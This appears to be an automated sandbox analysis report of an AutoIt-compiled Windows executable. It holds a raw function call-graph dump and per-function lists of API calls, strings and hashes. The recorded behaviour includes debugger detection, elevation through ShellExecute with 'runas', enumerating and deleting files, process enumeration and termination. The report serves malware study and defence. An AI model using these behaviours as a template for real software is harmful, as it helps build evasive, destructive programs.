102922->102859 102924 bf7d8a 102923->102924 102926 bf7d85 __fread_nolock 102923->102926 102925 c1017b 8 API calls 102924->102925 102927 c36528 102924->102927 102925->102926 102926->102913 102927->102927 102928->102636 102929->102639 102930->102643 102932 bf8ec0 52 API calls 102931->102932 102933 c789ed 102932->102933 102956 c78a32 messages 102933->102956 102969 c79730 102933->102969 102935 c78cde 102936 c78eac 102935->102936 102941 c78cec 102935->102941 103019 c79941 59 API calls 102936->103019 102939 c78ebb 102940 c78ec7 102939->102940 102939->102941 102940->102956 102982 c788e3 102941->102982 102942 bf8ec0 52 API calls 102960 c78aa6 102942->102960 102947 c78d25 102996 c0ffe0 102947->102996 102950 c78d45 103003 c63fe1 81 API calls __wsopen_s 102950->103003 102951 c78d5f 103004 bf7e12 102951->103004 102954 c78d50 GetCurrentProcess TerminateProcess 102954->102951 102956->102647 102960->102935 102960->102942 102960->102956 103001 c54ad3 8 API calls __fread_nolock 102960->103001 103002 c78f7a 41 API calls _strftime 102960->103002 102961 c78f22 102961->102956 102965 c78f36 FreeLibrary 102961->102965 102962 c78d9e 103016 c795d8 74 API calls 102962->103016 102965->102956 102967 c78daf 102967->102961 103017 c01ca0 8 API calls 102967->103017 103018 bfb4c8 8 API calls 102967->103018 103020 c795d8 74 API calls 102967->103020 102970 bfc2c9 8 API calls 102969->102970 102971 c7974b CharLowerBuffW 102970->102971 103021 c59805 102971->103021 102975 bfbf73 8 API calls 102976 c79787 102975->102976 102977 bfacc0 8 API calls 102976->102977 102978 c7979b 102977->102978 102979 bfadf4 8 API calls 102978->102979 102981 c797a5 _wcslen 102979->102981 102980 c798bb _wcslen 102980->102960 102981->102980 103028 c78f7a 41 API calls _strftime 102981->103028 102983 c788fe 102982->102983 102987 c78949 102982->102987 102984 c1017b 8 API calls 102983->102984 102985 c78920 102984->102985 102986 c1014b 8 API calls 102985->102986 102985->102987 102986->102985 102988 c79af3 102987->102988 102989 c79d08 
messages 102988->102989 102993 c79b17 _strcat _wcslen ___std_exception_copy 102988->102993 102989->102947 102990 bfc63f 39 API calls 102990->102993 102991 bfc98d 39 API calls 102991->102993 102992 bfca5b 39 API calls 102992->102993 102993->102989 102993->102990 102993->102991 102993->102992 102994 bf8ec0 52 API calls 102993->102994 103031 c5f8c5 10 API calls _wcslen 102993->103031 102994->102993 102998 c0fff5 102996->102998 102997 c1008d Sleep 102999 c1005b 102997->102999 102998->102997 102998->102999 103000 c1007b CloseHandle 102998->103000 102999->102950 102999->102951 103000->102999 103001->102960 103002->102960 103003->102954 103005 bf7e1a 103004->103005 103006 c1014b 8 API calls 103005->103006 103007 bf7e28 103006->103007 103032 bf8445 103007->103032 103010 bf8470 103035 bfc760 103010->103035 103012 bf8480 103013 c1017b 8 API calls 103012->103013 103014 bf851c 103012->103014 103013->103014 103014->102967 103015 c01ca0 8 API calls 103014->103015 103015->102962 103016->102967 103017->102967 103018->102967 103019->102939 103020->102967 103022 c59825 _wcslen 103021->103022 103023 c59914 103022->103023 103025 c5985a 103022->103025 103027 c59919 103022->103027 103023->102975 103023->102981 103025->103023 103029 c0e36b 41 API calls 103025->103029 103027->103023 103030 c0e36b 41 API calls 103027->103030 103028->102980 103029->103025 103030->103027 103031->102993 103033 c1014b 8 API calls 103032->103033 103034 bf7e30 103033->103034 103034->103010 103036 bfc76b 103035->103036 103037 c41285 103036->103037 103042 bfc773 messages 103036->103042 103039 c1014b 8 API calls 103037->103039 103038 bfc77a 103038->103012 103040 c41291 103039->103040 103042->103038 103043 bfc7e0 8 API calls messages 103042->103043 103043->103042 103045 c618b6 103044->103045 103046 c1014b 8 API calls 103045->103046 103047 c618bd 103046->103047 103050 c5fcb5 103047->103050 103049 c618f7 103049->102653 103051 bfc2c9 8 API calls 103050->103051 103052 c5fcc8 CharLowerBuffW 103051->103052 103053 c5fcdb 
103052->103053 103054 c5fd19 103053->103054 103055 bf655e 8 API calls 103053->103055 103067 c5fce5 ___scrt_fastfail 103053->103067 103056 c5fd2b 103054->103056 103057 bf655e 8 API calls 103054->103057 103055->103053 103058 c1017b 8 API calls 103056->103058 103057->103056 103062 c5fd59 103058->103062 103061 c5fdb8 103064 c1014b 8 API calls 103061->103064 103061->103067 103063 c5fd7b 103062->103063 103083 c5fbed 8 API calls 103062->103083 103068 c5fe0c 103063->103068 103065 c5fdd2 103064->103065 103066 c1017b 8 API calls 103065->103066 103066->103067 103067->103049 103069 bfbf73 8 API calls 103068->103069 103070 c5fe3e 103069->103070 103071 bfbf73 8 API calls 103070->103071 103072 c5fe47 103071->103072 103073 bfbf73 8 API calls 103072->103073 103078 c5fe50 103073->103078 103074 bf8577 8 API calls 103074->103078 103075 c60114 103075->103061 103076 bfad40 8 API calls 103076->103078 103077 c166f8 GetStringTypeW 103077->103078 103078->103074 103078->103075 103078->103076 103078->103077 103080 c16641 39 API calls 103078->103080 103081 c5fe0c 40 API calls 103078->103081 103082 bfbed9 8 API calls 103078->103082 103084 c16722 GetStringTypeW _strftime 103078->103084 103080->103078 103081->103078 103082->103078 103083->103062 103084->103078 103117 c602aa 103085->103117 103087 c60399 __fread_nolock 103087->102661 103089 c603f3 103133 c605e9 56 API calls __fread_nolock 103089->103133 103090 c6040b 103092 c60471 103090->103092 103095 c6041b 103090->103095 103092->103087 103093 c60507 103092->103093 103094 c604a1 103092->103094 103097 c605b0 103093->103097 103098 c60510 103093->103098 103096 c604d1 103094->103096 103105 c604a6 103094->103105 103116 c60453 103095->103116 103134 c62855 10 API calls 103095->103134 103096->103087 103138 bfca5b 39 API calls 103096->103138 103097->103087 103142 bfc63f 39 API calls 103097->103142 103099 c60515 103098->103099 103100 c6058d 103098->103100 103106 c60554 103099->103106 103107 c6051b 103099->103107 103100->103087 103141 bfc63f 39 API calls 
103100->103141 103105->103087 103137 bfca5b 39 API calls 103105->103137 103106->103087 103140 bfc63f 39 API calls 103106->103140 103107->103087 103139 bfc63f 39 API calls 103107->103139 103112 c60427 103135 c62855 10 API calls 103112->103135 103114 c6043e __fread_nolock 103136 c62855 10 API calls 103114->103136 103124 c61844 103116->103124 103118 c602f7 103117->103118 103122 c602bb 103117->103122 103120 bfc98d 39 API calls 103118->103120 103119 c602f5 103119->103087 103119->103089 103119->103090 103120->103119 103121 bf8ec0 52 API calls 103121->103122 103122->103119 103122->103121 103143 c14d98 103122->103143 103125 c6184f 103124->103125 103126 c1014b 8 API calls 103125->103126 103127 c61856 103126->103127 103128 c61862 103127->103128 103129 c61883 103127->103129 103131 c1017b 8 API calls 103128->103131 103130 c1017b 8 API calls 103129->103130 103132 c6186b ___scrt_fastfail 103130->103132 103131->103132 103132->103087 103133->103087 103134->103112 103135->103114 103136->103116 103137->103087 103138->103087 103139->103087 103140->103087 103141->103087 103142->103087 103144 c14da6 103143->103144 103145 c14e1b 103143->103145 103149 c14dcb 103144->103149 103153 c1f649 20 API calls __dosmaperr 103144->103153 103155 c14e2d 40 API calls 4 library calls 103145->103155 103148 c14e28 103148->103122 103149->103122 103150 c14db2 103154 c22b5c 26 API calls __cftof 103150->103154 103152 c14dbd 103152->103122 103153->103150 103154->103152 103155->103148 103157 bfbf73 8 API calls 103156->103157 103158 c5dc73 103157->103158 103159 bfbf73 8 API calls 103158->103159 103160 c5dc7c 103159->103160 103161 bfbf73 8 API calls 103160->103161 103162 c5dc85 103161->103162 103180 bf5851 103162->103180 103167 c5dcab 103169 bf568e 8 API calls 103167->103169 103168 bf6b7c 8 API calls 103168->103167 103170 c5dcbf FindFirstFileW 103169->103170 103171 c5dd4b FindClose 103170->103171 103174 c5dcde 103170->103174 103176 c5dd56 103171->103176 103172 c5dd26 FindNextFileW 103172->103174 103173 bfbed9 8 
API calls 103173->103174 103174->103171 103174->103172 103174->103173 103175 bf7bb5 8 API calls 103174->103175 103192 bf6b7c 103174->103192 103175->103174 103176->102666 103179 c5dd42 FindClose 103179->103176 103201 c322d0 103180->103201 103183 bf587d 103185 bf8577 8 API calls 103183->103185 103184 bf5898 103186 bfbd57 8 API calls 103184->103186 103187 bf5889 103185->103187 103186->103187 103203 bf55dc 103187->103203 103190 c5eab0 GetFileAttributesW 103191 c5dc99 103190->103191 103191->103167 103191->103168 103193 bf6b93 103192->103193 103194 c357fe 103192->103194 103207 bf6ba4 103193->103207 103195 c1014b 8 API calls 103194->103195 103198 c35808 _wcslen 103195->103198 103197 bf6b9e DeleteFileW 103197->103172 103197->103179 103199 c1017b 8 API calls 103198->103199 103200 c35841 __fread_nolock 103199->103200 103202 bf585e GetFullPathNameW 103201->103202 103202->103183 103202->103184 103204 bf55ea 103203->103204 103205 bfadf4 8 API calls 103204->103205 103206 bf55fe 103205->103206 103206->103190 103208 bf6bb4 _wcslen 103207->103208 103209 c35860 103208->103209 103210 bf6bc7 103208->103210 103211 c1014b 8 API calls 103209->103211 103212 bf7d74 8 API calls 103210->103212 103213 c3586a 103211->103213 103214 bf6bd4 __fread_nolock 103212->103214 103215 c1017b 8 API calls 103213->103215 103214->103197 103216 c3589a __fread_nolock 103215->103216 103218 c1014b 8 API calls 103217->103218 103219 bf424e 103218->103219 103219->102674 103220->102677 103222 c1014b 8 API calls 103221->103222 103223 c0bc65 103222->103223 103224 bfb329 8 API calls 103223->103224 103225 c0bc70 103224->103225 103225->102685 103227 bf3996 ___scrt_fastfail 103226->103227 103247 bf5f32 103227->103247 103230 bf3a1c 103232 bf3a3a Shell_NotifyIconW 103230->103232 103233 c340cd Shell_NotifyIconW 103230->103233 103251 bf61a9 103232->103251 103235 bf3a50 103235->102695 103237 bf3969 103236->103237 103238 bf3919 ___scrt_fastfail 103236->103238 103237->102695 103239 bf3938 Shell_NotifyIconW 103238->103239 
103239->103237 103241 c1017b 8 API calls 103240->103241 103242 bf7afa 103241->103242 103243 c1014b 8 API calls 103242->103243 103244 bf7b08 103243->103244 103244->102695 103245->102695 103246->102695 103248 bf5f4e 103247->103248 103249 bf39eb 103247->103249 103248->103249 103250 c35070 DestroyIcon 103248->103250 103249->103230 103281 c5d11f 42 API calls _strftime 103249->103281 103250->103249 103252 bf62a8 103251->103252 103253 bf61c6 103251->103253 103252->103235 103254 bf7ad5 8 API calls 103253->103254 103255 bf61d4 103254->103255 103256 c35278 LoadStringW 103255->103256 103257 bf61e1 103255->103257 103260 c35292 103256->103260 103258 bf8577 8 API calls 103257->103258 103259 bf61f6 103258->103259 103261 bf6203 103259->103261 103269 c352ae 103259->103269 103263 bfbed9 8 API calls 103260->103263 103266 bf6229 ___scrt_fastfail 103260->103266 103261->103260 103262 bf620d 103261->103262 103264 bf6b7c 8 API calls 103262->103264 103263->103266 103265 bf621b 103264->103265 103267 bf7bb5 8 API calls 103265->103267 103270 bf628e Shell_NotifyIconW 103266->103270 103267->103266 103268 c352f1 103283 c0fe6f 51 API calls 103268->103283 103269->103266 103269->103268 103271 bfbf73 8 API calls 103269->103271 103270->103252 103272 c352d8 103271->103272 103282 c5a350 9 API calls 103272->103282 103275 c35310 103277 bf6b7c 8 API calls 103275->103277 103276 c352e3 103278 bf7bb5 8 API calls 103276->103278 103279 c35321 103277->103279 103278->103268 103280 bf6b7c 8 API calls 103279->103280 103280->103266 103281->103230 103282->103276 103283->103275 103285 c1017b 8 API calls 103284->103285 103286 c0c209 103285->103286 103287 c1014b 8 API calls 103286->103287 103288 c0c215 103287->103288 103288->102716 103290 c0fa35 103289->103290 103291 c0f9fe 103289->103291 103298 c0fe8a 8 API calls 103290->103298 103292 c1017b 8 API calls 103291->103292 103294 c0fa05 WideCharToMultiByte 103292->103294 103297 c0fa3e 8 API calls __fread_nolock 103294->103297 103296 c0fa29 103296->102721 103297->103296 
105033 bfbed9 8 API calls 105032->105033 105033->105031 105034->105029 105035 c00ebf 105036 c00ed3 105035->105036 105042 c01425 105035->105042 105037 c00ee5 105036->105037 105039 c1014b 8 API calls 105036->105039 105040 c4562c 105037->105040 105041 c00f3e 105037->105041 105068 bfb4c8 8 API calls 105037->105068 105039->105037 105069 c61b14 8 API calls 105040->105069 105043 c02b20 224 API calls 105041->105043 105048 c0049d messages 105041->105048 105042->105037 105045 bfbed9 8 API calls 105042->105045 105047 c00376 messages 105043->105047 105045->105037 105046 c4632b 105073 c63fe1 81 API calls __wsopen_s 105046->105073 105047->105046 105047->105048 105049 c01e50 40 API calls 105047->105049 105050 c01695 105047->105050 105051 c1014b 8 API calls 105047->105051 105053 c4625a 105047->105053 105054 bfbed9 8 API calls 105047->105054 105055 c45cdb 105047->105055 105059 c105b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 105047->105059 105060 c01990 224 API calls 105047->105060 105062 bfbf73 8 API calls 105047->105062 105063 c00aae messages 105047->105063 105064 c10568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 105047->105064 105065 c46115 105047->105065 105067 c10413 29 API calls pre_c_initialization 105047->105067 105049->105047 105050->105048 105058 bfbed9 8 API calls 105050->105058 105051->105047 105072 c63fe1 81 API calls __wsopen_s 105053->105072 105054->105047 105055->105048 105061 bfbed9 8 API calls 105055->105061 105058->105048 105059->105047 105060->105047 105061->105048 105062->105047 105071 c63fe1 81 API calls __wsopen_s 105063->105071 105064->105047 105070 c63fe1 81 API calls __wsopen_s 105065->105070 105067->105047 105068->105037 105069->105048 105070->105063 105071->105048 105072->105048 105073->105048

Control-flow Graph
APIs
• GetVersionExW.KERNEL32(?), ref: 00BF5FF7
  • Part of subcall function 00BF8577: _wcslen.LIBCMT ref: 00BF858A
• GetCurrentProcess.KERNEL32(?,00C8DC2C,00000000,?,?), ref: 00BF6123
• IsWow64Process.KERNEL32(00000000,?,?), ref: 00BF612A
• LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00BF6155
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00BF6167
• GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00BF6175
• FreeLibrary.KERNEL32(00000000,?,?), ref: 00BF617C
• GetSystemInfo.KERNEL32(?,?,?), ref: 00BF61A1
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
Similarity
• API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
• String ID: GetNativeSystemInfo$kernel32.dll$|O
• API String ID: 3290436268-3101561225
• Opcode ID: 26fa03554ff4d6000abefbdf63acebf7149ac5025828a00909252971c25bc2ac
• Instruction ID: 10bc44d11398d2fbb1306b2b2fe4edf3170af995388732471a180739d48aa714
• Opcode Fuzzy Hash: 26fa03554ff4d6000abefbdf63acebf7149ac5025828a00909252971c25bc2ac
• Instruction Fuzzy Hash: A5A1A13591A2C4CFC716CB68FC85BAD3FAC6B26300F1C59D9D981A7272C66D4648CB35

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00BF3368,?), ref: 00BF33BB
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00BF3368,?), ref: 00BF33CE
• GetFullPathNameW.KERNEL32(00007FFF,?,?,00CC2418,00CC2400,?,?,?,?,?,?,00BF3368,?), ref: 00BF343A
  • Part of subcall function 00BF8577: _wcslen.LIBCMT ref: 00BF858A
  • Part of subcall function 00BF425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00BF3462,00CC2418,?,?,?,?,?,?,?,00BF3368,?), ref: 00BF42A0
• SetCurrentDirectoryW.KERNEL32(?,00000001,00CC2418,?,?,?,?,?,?,?,00BF3368,?), ref: 00BF34BB
• MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00C33CB0
• SetCurrentDirectoryW.KERNEL32(?,00CC2418,?,?,?,?,?,?,?,00BF3368,?), ref: 00C33CF1
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00CB31F4,00CC2418,?,?,?,?,?,?,?,00BF3368), ref: 00C33D7A
• ShellExecuteW.SHELL32(00000000,?,?), ref: 00C33D81
  • Part of subcall function 00BF34D3: GetSysColorBrush.USER32(0000000F), ref: 00BF34DE
  • Part of subcall function 00BF34D3: LoadCursorW.USER32(00000000,00007F00), ref: 00BF34ED
  • Part of subcall function 00BF34D3: LoadIconW.USER32(00000063), ref: 00BF3503
  • Part of subcall function 00BF34D3: LoadIconW.USER32(000000A4), ref: 00BF3515
  • Part of subcall function 00BF34D3: LoadIconW.USER32(000000A2), ref: 00BF3527
  • Part of subcall function 00BF34D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00BF353F
  • Part of subcall function 00BF34D3: RegisterClassExW.USER32(?), ref: 00BF3590
  • Part of subcall function 00BF35B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00BF35E1
  • Part of subcall function 00BF35B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00BF3602
  • Part of subcall function 00BF35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00BF3368,?), ref: 00BF3616
  • Part of subcall function 00BF35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00BF3368,?), ref: 00BF361F
  • Part of subcall function 00BF396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BF3A3C
Strings
• AutoIt, xrefs: 00C33CA5
• It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00C33CAA
• runas, xrefs: 00C33D75
Memory Dump Source
• Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
Similarity
• API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
• String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
• API String ID: 683915450-2030392706
• Opcode ID: beae285514dc5a288701da4c69703a63b3c12bde8550146e4d77754f1f86d7c9
• Instruction ID: d24d91fccccc6f9cc803fd50ae94d0d9cf87d7da54e4e2f6d1bb52f9f8ef1da8
• Opcode Fuzzy Hash: beae285514dc5a288701da4c69703a63b3c12bde8550146e4d77754f1f86d7c9
• Instruction Fuzzy Hash: A351F8701083886BDB05EF60EC45FBE7BF89F94740F04056CF692531A2DB648A4ED762

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            [Figure: control-flow graph beginning at block c5dc54-c5dc9b; legend: Executed / Not Executed; blocks call FindFirstFileW, DeleteFileW, FindNextFileW and FindClose]
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BF55D1,?,?,00C34B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00BF5871
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5EAB0: GetFileAttributesW.KERNEL32(?,00C5D840), ref: 00C5EAB1
                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00C5DCCB
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C5DD1B
                                                                                                                                                                                                                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00C5DD2C
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C5DD43
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C5DD4C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                                                                                                                            • API String ID: 2649000838-1173974218
                                                                                                                                                                                                                                                                            • Opcode ID: b096225445b1ebd99233fb431044ae20a04c64604eeccfe276854011ed876112
                                                                                                                                                                                                                                                                            • Instruction ID: 54698da04a184794b50e43a72af1f0c72ccaeaea35b4bc256ceb860fba61b481
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b096225445b1ebd99233fb431044ae20a04c64604eeccfe276854011ed876112
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31317E35008349ABC310EF20C8859AFB7E8AE95301F404D9DF9E683191EB21DE0DCB67
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00C5DDAC
                                                                                                                                                                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00C5DDBA
                                                                                                                                                                                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00C5DDDA
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C5DE87
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 420147892-0
                                                                                                                                                                                                                                                                            • Opcode ID: 98513431e113f526c508f35c7cb9903bed182b97c4de6bbe147f4976141896c2
                                                                                                                                                                                                                                                                            • Instruction ID: b105500e76693d452cae8ce44df75fb684f8be5311eccc52916d21ef4c27c50e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98513431e113f526c508f35c7cb9903bed182b97c4de6bbe147f4976141896c2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DB317E710083049FD310EF50D885FAEBBE8AF99350F04096DFA82871A1DB719A89CB96
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetInputState.USER32 ref: 00BFEF07
                                                                                                                                                                                                                                                                            • timeGetTime.WINMM ref: 00BFF107
                                                                                                                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BFF228
                                                                                                                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 00BFF27B
                                                                                                                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 00BFF289
                                                                                                                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BFF29F
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 00BFF2B1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2189390790-0
                                                                                                                                                                                                                                                                            • Opcode ID: e58507d9ce22f1d7185f6d4b2c06572989cf8f5b93b61115a6b702ba51e86e12
                                                                                                                                                                                                                                                                            • Instruction ID: 3ad1199200eb44a253a5b01d6786ed721c022041c03b7ef6c230e0bcf28ec646
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e58507d9ce22f1d7185f6d4b2c06572989cf8f5b93b61115a6b702ba51e86e12
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE32E370604246EFD728CF24C884FBAB7E5FF81304F24456DE665872A1DB71E988CB86

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00BF3657
                                                                                                                                                                                                                                                                            • RegisterClassExW.USER32(00000030), ref: 00BF3681
                                                                                                                                                                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BF3692
                                                                                                                                                                                                                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 00BF36AF
                                                                                                                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BF36BF
                                                                                                                                                                                                                                                                            • LoadIconW.USER32(000000A9), ref: 00BF36D5
                                                                                                                                                                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BF36E4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                                            • API String ID: 2914291525-1005189915

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            APIs
